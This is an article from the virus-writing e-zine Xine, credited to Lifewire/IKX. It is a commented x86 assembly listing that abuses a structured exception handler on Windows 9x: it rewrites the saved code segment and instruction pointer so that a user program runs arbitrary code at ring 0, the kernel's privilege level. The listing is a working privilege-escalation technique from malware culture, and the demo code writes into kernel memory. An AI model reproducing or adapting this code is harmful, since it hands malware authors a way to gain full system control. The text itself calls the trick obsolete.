Copy Link
Add to Bookmark
Report
Xine - issue #5 - Phile 115
Ú-----------------------------¿
| Xine - issue #5 - Phile 115 |
À-----------------------------Ù
; Another way to get on ring0 in 9x. Not usefull nowadays, but maybe you
; find it interesting... and it is new so it is cool (?!) :)
; btw, the clue in 9x to get @ r0 is just to exec at cs=28, jmpfar & iret
; etc. aren't allowed.. so do it in this way.
;
; hmm. I see z0mbie has something like this published in mtx2 too.. hmmz
; ok, i ripped the ring0 safety pushes / stackinit from him :)
.386p
.model flat
extrn ExitProcess:PROC; ;apis are your best friend :)
;----------------------------------------------------------------------------;
_CODE segment dword use32 public 'CODE'
start:
int 3 ;bpint 3 do "reip eip+1" ?
call initring0 ;seh addr. on stack due call
;this is the seh.. believe me or not
pushad
mov edx,dword ptr [esp+3*4+20h] ;where is the context record?
;maybe in edx? well i hope, u?
push 28h
pop eax ;oh how optimized is me! ;)
xchg [edx+0bch],eax ;0bch = regCS
mov [oldcs],eax ;lets save it
mov dword ptr [edx+0b8h],offset ring0code ;0b8h = regEip
popad ;pop
xor eax,eax ;continue exec
ret ;read further @ ring0code
initring0:
xor edx,edx
push dword ptr fs:[edx]
mov fs:[edx],esp ;esp points to addr. seh
inc dword ptr [edx] ;read further after initring0
;----------------------------------------------------------------------------;
ring0code: ;same offset... other segment
int 3 ;viva la softice
mov dword ptr ss:[oldesp], esp ;save current ESP
lea esp, endstack ;esp pointed not to stack!
pushad
push ds es
push ss ss ;make es & ds <- ss
pop ds es
;-- put your ring0 code from here
inc dword ptr ds:[0bff70400h] ;show off with our power :)
;-- till here
pop es ds ;restore es & ds
popad
mov esp, dword ptr ss:[oldesp] ;restore esp, else *crash*
exit_ring0: ;say bye to ring0, welcome r3
pushf
push oldcs
push offset ring3
iret
;----------------------------------------------------------------------------;
ring3: ;and here we are a ring3 lamer
xor edx,edx
pop dword ptr fs:[edx] ;restore the seh
pop edx ;and undo the call initring0
push 0
call ExitProcess
oldcs dd ? ;here we stored the org. CS
oldesp dd ? ;and here... maybe esp?
mystack db 1024 dup (0h)
endstack:
_CODE ends
;----------------------------------------------------------------------------;
;----------------------------------------------------------------------------;
_DATA segment dword use32 public 'DATA'
db "ring0 by Lifewire/IKX"
_DATA ends
;----------------------------------------------------------------------------;
end start
end
